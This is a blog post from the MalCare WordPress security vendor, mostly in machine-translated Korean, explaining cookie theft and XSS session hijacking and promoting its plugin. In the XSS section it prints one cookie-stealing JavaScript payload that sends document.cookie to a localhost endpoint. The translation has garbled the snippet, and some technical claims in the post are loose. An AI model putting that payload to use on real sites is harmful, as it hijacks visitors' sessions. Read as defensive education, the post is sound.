웹사이트에서 쿠키를 사용하여 기밀 데이터를 저장한다는 사실을 알고 계셨습니까? 해커가 쿠키를 쉽게 훔칠 수 있다는 사실을 알고 계셨습니까? 이는 귀하의 웹사이트와 방문자를 위험에 빠뜨릴 수 있습니다!
쿠키는 고객의 광고 선호도에서 로그인 자격 증명 및 신용 카드 정보에 이르기까지 모든 종류의 정보를 저장합니다. 쿠키는 인터넷 전반에 걸쳐 널리 사용되며 얼마나 자주 도난당하는지 겁이 납니다.
쿠키 도용이나 세션 하이재킹의 피해자라면 그 영향이 심각합니다. 수익과 방문자의 신뢰를 잃을 뿐만 아니라 법적 문제와 막대한 벌금에 직면할 수도 있습니다!
하지만 오늘은 이러한 공격을 방지하기 위해 알아야 할 모든 정보를 제공하므로 걱정하지 마세요!
이 가이드에서는 먼저 해커가 쿠키를 훔치는 방법을 배운 다음 예방 조치를 살펴보겠습니다.
TL;DR : WordPress 웹사이트가 걱정되십니까? 세션 하이재킹 및 쿠키 도용 방지 플러그인을 설치하여 지금 사이트를 보호할 수 있습니다. . 정기적으로 웹사이트를 검사하고 해커가 쿠키를 훔칠 수 있는 악성 코드를 삽입하면 경고합니다. 플러그인을 사용하면 해킹을 즉시 정리하고 영향을 피할 수 있습니다.
목차
→ 쿠키 훔치기란?
→ 해커가 쿠키를 훔치고 세션을 가로채기 위해 XSS(교차 사이트 스크립팅)를 사용하는 방법은 무엇입니까?
→ 쿠키 도용 및 세션 하이재킹을 방지하는 방법은 무엇입니까?
→ 웹사이트 방문자가 쿠키 도용에 대해 취할 수 있는 조치
쿠키 도용이란 무엇입니까?
우리가 원하는 만큼, 쿠키 훔치는 것은 아이가 쿠키 항아리에 손을 집어넣는 것처럼 간단하지 않습니다! 이것은 복잡한 과정이며 무슨 일이 일어나고 있는지 이해하려면 기본 사항을 다루어야 합니다.
→ 쿠키란 무엇입니까?
쿠키는 아주 작은 데이터 조각으로 생각할 수 있습니다. 웹 사이트와의 상호 작용에 대한 정보를 저장합니다. 예를 들어, 전자 상거래 사이트는 검색한 제품, 구매한 제품, 장바구니에 버려진 품목 또는 방문하는 페이지와 같은 고객의 여정을 추적하려고 합니다.
이를 통해 고객이 선호하는 항목, 가장 많이 방문하는 페이지, 사용자가 페이지에 머문 시간 등에 대한 분석 정보를 제공합니다. 그런 다음 이 정보를 사용하여 웹사이트에 표시되는 내용을 맞춤화할 수 있습니다. 고객의 취향에 따라.
쿠키는 웹사이트 소유자에게 작동하는 것과 작동하지 않는 것에 대한 통찰력을 제공합니다. 이는 사이트에서 변경하거나 개선해야 할 사항을 결정하는 데 도움이 됩니다.
쿠키는 또한 사용자에게 관련 광고를 표시하는 데 사용됩니다. 웹사이트를 방문하면 광고가 표시되는 것을 볼 수 있습니다.
이러한 광고는 일반적으로 최근 검색 기록을 반영합니다. 예를 들어, Google에서 '노트북'을 검색하면 모든 웹사이트의 광고에 Dell 광고가 표시됩니다. 이러한 광고는 웹사이트의 일부가 아니지만 Google Adsense와 같은 서비스에서 처리됩니다.
쿠키는 웹사이트 소유자와 사용자 모두에게 편리합니다. 참여를 높이고 웹 사이트 소유자에게 좋은 더 많은 판매로 이어질 수 있습니다. 구매자의 경우 쿠키는 웹사이트에서 보다 개인화된 경험을 제공하거나 보다 관련성 높은 광고를 보는 데 도움이 됩니다.
그러나 나중에 논의할 많은 단점이 있습니다.
[맨 위로 이동 ↑]
→ 브라우저 세션 및 세션 ID란 무엇입니까?
웹사이트에 로그인하면 컴퓨터와 이 웹사이트 사이에 세션이 생성됩니다.
예를 들어 Facebook에 로그인하면 세션이 시작됩니다. 이렇게 하면 '로그아웃'을 클릭하고 세션을 종료할 때까지 Facebook을 계속 사용할 수 있습니다(웹 브라우저를 닫았다가 다시 열어도).
세션이 생성되지 않은 경우 매번 계속 로그인해야 합니다 당신은 새로운 데이터를 원했습니다. 예를 들어, Facebook 뉴스 피드를 떠나 친구의 프로필 페이지를 보려면 Facebook에서 로그아웃되며 로그인하여 친구의 프로필을 보려면 자격 증명을 다시 입력해야 합니다.
이것이 세션이 필요한 이유입니다. 계속해서 다른 웹 페이지를 탐색하고 웹사이트를 탐색할 수 있도록 로그인 상태를 유지합니다.
여기서 주목해야 할 중요한 점은 모든 세션이 쿠키 세트를 생성한다는 것입니다. 이러한 세션 쿠키를 호출할 수 있습니다. 그리고 각 세션 쿠키에는 고유한 세션 ID가 있습니다.
웹사이트는 이 ID를 사용하여 사용자를 인증하고 신뢰할 수 있는 연결을 설정합니다.
예를 들어 Facebook에 로그인하려면 사용자 이름과 비밀번호를 입력해야 합니다. 다음으로 고유 ID로 세션이 생성됩니다. Facebook 웹사이트에 대한 모든 요청은 이 ID로 인증됩니다. 따라서 다른 페이지를 보고 싶을 때 해당 페이지를 표시하도록 Facebook 서버에 요청을 보내는 것입니다. 페이스북이 아이디를 확인하고 보고 싶은 콘텐츠를 보여줍니다.
이제 해커가 세션을 가로채고 이 신뢰할 수 있는 연결을 남용할 수 있습니다. 그들은 당신을 대신하여 악의적인 요청을 보낼 수 있습니다. 방법을 알아보겠습니다.
[맨 위로 이동 ↑]
→ 쿠키의 보안 문제는 무엇입니까?
쿠키가 생성되면 사이트 소유자인 귀하만 볼 수 있습니다. 다른 웹사이트에서는 귀하의 쿠키를 볼 수 없습니다. 그들은 전적으로 귀하의 소유입니다.
그러나 이러한 쿠키는 인터넷을 통해 이동합니다. 광고 서비스 및 분석 서비스에서 사용됩니다. 따라서 이러한 쿠키는 전 세계의 서버에서 서버로 바운스됩니다. 연결이 안전하지 않으면 해커가 이러한 쿠키를 쉽게 가로채서 훔칠 수 있습니다.
이제 해커가 쇼핑 선호도에 대한 정보를 얻을 수 있다면 큰일이라고 생각할 수 있습니다.
문제는 쿠키가 귀하의 쇼핑 선호도에 대한 정보 이상으로 저장된다는 것입니다. 은행 세부정보 및 개인 정보도 저장합니다. 배송 주소 및 연락처 정보 등
이러한 정보가 엉뚱한 손에 들어가면 사기 행위에 악용될 수 있습니다.
해커가 쿠키를 훔치는 가장 일반적인 방법 중 하나는 사용자와 동일한 Wi-Fi를 사용하는 경우입니다. 이러한 종류의 Wi-Fi 해킹을 중간자 공격(man-in-the-middle attack)이라고 하며 둘 다 동일한 무선 네트워크에 연결된 경우에만 발생할 수 있습니다. 이것이 공용 Wi-Fi를 절대 사용하지 않는 것을 권장하는 이유입니다. 보안되지 않거나 많은 사람들이 사용합니다. 이는 동일한 컴퓨터 네트워크 내의 사용자에게도 발생할 수 있습니다.
다른 몇 가지 방법에는 패킷 스니핑과 교차 사이트 스크립팅이라는 취약점을 이용하는 방법이 있습니다. 오늘은 XSS 쿠키 도용이 어떻게 작동하는지 자세히 보여드리겠습니다.
[맨 위로 이동 ↑]
해커가 XSS(교차 사이트 스크립팅)를 사용하여 쿠키를 훔치고 세션을 가로채는 방법은 무엇입니까?
해커가 XSS(교차 사이트 스크립팅) 공격을 사용하여 쿠키를 훔치는 방법을 보여주기 위해 예를 사용합니다. 댓글 섹션이 있는 웹사이트를 방문했다고 가정해 보겠습니다.
귀하가 작성하는 모든 의견은 웹사이트의 데이터베이스로 전송됩니다. 이상적으로는 이 주석 섹션은 일반 영어로 된 텍스트만 허용하도록 구성해야 합니다. 그러나 특수 문자도 허용하면 XSS에 취약합니다.
해커는 자신의 악성 코드를 입력하여 데이터베이스로 보낼 수 있습니다. 내부에 들어가면 코드가 실행됩니다. 해커가 웹사이트에 삽입하여 새 웹사이트 관리자를 생성하거나 쿠키를 훔치는 것과 같은 모든 종류의 악의적인 활동을 실행할 수 있는 수많은 코드가 있습니다.
쿠키를 훔치기 위해 해커는 다음 코드를 입력할 수 있습니다.
참고:이것은 쿠키를 훔치는 방법에 대한 튜토리얼이 아닙니다. 이 문서는 웹사이트 소유자에게 해커가 쿠키를 훔칠 수 있는 방법을 알리기 위한 것입니다. 불법적인 활동을 하는 것은 권장하지 않습니다.
[php]
document.write('<img src=& amp;amp;amp;quot;https://localhost/submitcookie.php? 쿠키 ='
+ 탈출(document.cookie) + '" />);
[/php]
주석 섹션에서 이 코드는 이미지로 나타납니다. (방문자로서) 클릭하면 이미지가 표시됩니다. 하지만 방금 일어난 일이 아닙니다.
이미지를 클릭하면 이 PHP 파일이 자동으로 코드를 실행하고 세션 쿠키와 세션 ID를 가져옵니다.
이제 해커가 세션을 다시 만들고 해당 웹사이트에서 사용자로 가장할 수 있습니다. 그들은 많은 악의적인 행동을 수행할 수 있습니다. 예를 들어 쿠키에 신용 카드나 기타 결제 정보가 포함되어 있으면 구매할 수 있습니다.
다행히도 이러한 해킹으로부터 웹사이트 소유자와 방문자를 보호하기 위한 예방 조치가 있습니다.
웹사이트 및 이메일의 댓글 섹션에서 의심스러운 링크를 클릭하지 마십시오. 쿠키 절도의 피해자가 될 수 있습니다. 트윗하려면 클릭[맨 위로 이동 ↑]
쿠키 도용 및 세션 하이재킹을 방지하는 방법
쿠키 도용 및 세션 하이재킹을 방지하는 역할을 하는 두 당사자, 즉 웹사이트 소유자와 방문자가 있습니다. 양측의 예방 조치를 논의하겠습니다.
→ 웹사이트 소유자가 쿠키 도용에 대해 취할 수 있는 조치
웹사이트 소유자로서 모든 것을 처리할 보안 분석가가 없는 경우 다음 예방 조치를 구현해야 합니다.
1. SSL 인증서 설치
데이터는 사용자의 브라우저와 웹 서버 간에 지속적으로 전송됩니다. SSL이 없으면 이 데이터(쿠키)는 일반 텍스트로 전송됩니다. 해커가 이 데이터를 가로채면 간단히 읽을 수 있습니다. 따라서 로그인 자격 증명이 포함되어 있으면 노출됩니다.
SSL(Secure Sockets Layer)은 데이터를 전송하기 전에 암호화합니다. 따라서 해커가 훔쳐도 데이터를 읽을 수 없습니다.
웹 호스팅 회사 또는 SSL 공급자를 통해 SSL 인증서를 얻을 수 있습니다. Let's Encrypt에서 기본 무료 SSL 인증서를 받을 수도 있습니다.
2. 보안 플러그인 설치
WordPress 보안 플러그인 유지 귀하의 웹사이트에서 활성화된 MalCare와 같은 플러그인의 방화벽은 웹사이트에 대한 해킹 시도를 방지하고 악성 IP 주소를 차단합니다. 또한 정기적으로 사이트를 검사하고 해커가 악성 코드를 입력한 경우 경고합니다. 웹사이트를 즉시 정리할 수 있습니다. 이렇게 하면 해를 입히기 직전에 이러한 해킹 시도를 감지하고 삭제할 수 있습니다.
3. 웹사이트 업데이트
웹 사이트를 항상 최신 상태로 유지하십시오. 여기에는 WordPress 설치, 테마 및 플러그인이 포함됩니다. 오래된 소프트웨어에서 실행하면 웹사이트에서 해커가 악용할 수 있는 취약한 지점이 많이 열립니다. 새 업데이트가 있을 때 사이트를 업데이트해야 합니다.
이러한 업데이트는 새로운 기능과 버그 수정을 포함할 뿐만 아니라 때때로 보안 결함도 수정합니다.
4. 웹사이트 강화
WordPress.org는 웹사이트에서 구현해야 하는 특정 웹사이트 강화 조치를 권장합니다. 여기에는 강력하고 고유한 사용자 이름과 강력한 암호 사용, 알 수 없는 폴더에서 PHP 실행 차단, 테마 및 플러그인에서 파일 편집기 비활성화 등이 포함됩니다. 이제 이 모든 것이 전문 용어처럼 들릴 수 있으므로 따라할 수 있는 WordPress 강화에 대한 심층적인 단계별 가이드를 만들었습니다.
[맨 위로 이동 ↑]
쿠키 도용에 맞서 웹사이트 방문자가 취할 수 있는 조치
웹사이트 방문자는 웹사이트가 적절한 보안 조치를 취했다고 맹목적으로 신뢰할 필요가 없습니다. 다음 웹 보안 프로토콜로 자신을 보호할 수 있습니다.
1. 효과적인 안티바이러스 설치
인터넷에 액세스하는 데 사용하는 장치에 맬웨어 방지 소프트웨어가 설치되어 있는지 확인합니다. 악성 웹사이트를 방문할 때 맬웨어가 감지되면 이를 알려줍니다. 또한 실수로 시스템에 다운로드하거나 설치할 수 있는 모든 맬웨어를 제거합니다.
2. 의심스러운 링크를 클릭하지 마십시오
해커는 웹사이트의 댓글 섹션과 이메일을 통해 사용자를 표적으로 삼습니다. 신뢰할 수 없는 링크, 특히 매력적인 제안이나 할인으로 유혹하는 링크를 클릭하지 마십시오.
3. 민감한 데이터 저장 방지
쇼핑 웹사이트에 신용카드 정보를 저장하면 보다 빠르고 편리하게 결제할 수 있습니다. Saving passwords on web browsers like Google Chrome to auto log into websites eliminates the need to remember passwords!
But it all comes with a high risk of being stolen. It’s best to never store sensitive data on websites. It may save you a few seconds, but it also puts you at risk of being attacked.
4. Clear Cookies
You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History> Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.
Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.
That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.
This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. 확인 해봐. Click to Tweet[Back to Top ↑]
Final Thoughts
As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.
There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.
But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.
An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.
<강한>
Keep your WordPress site protected with MalCare !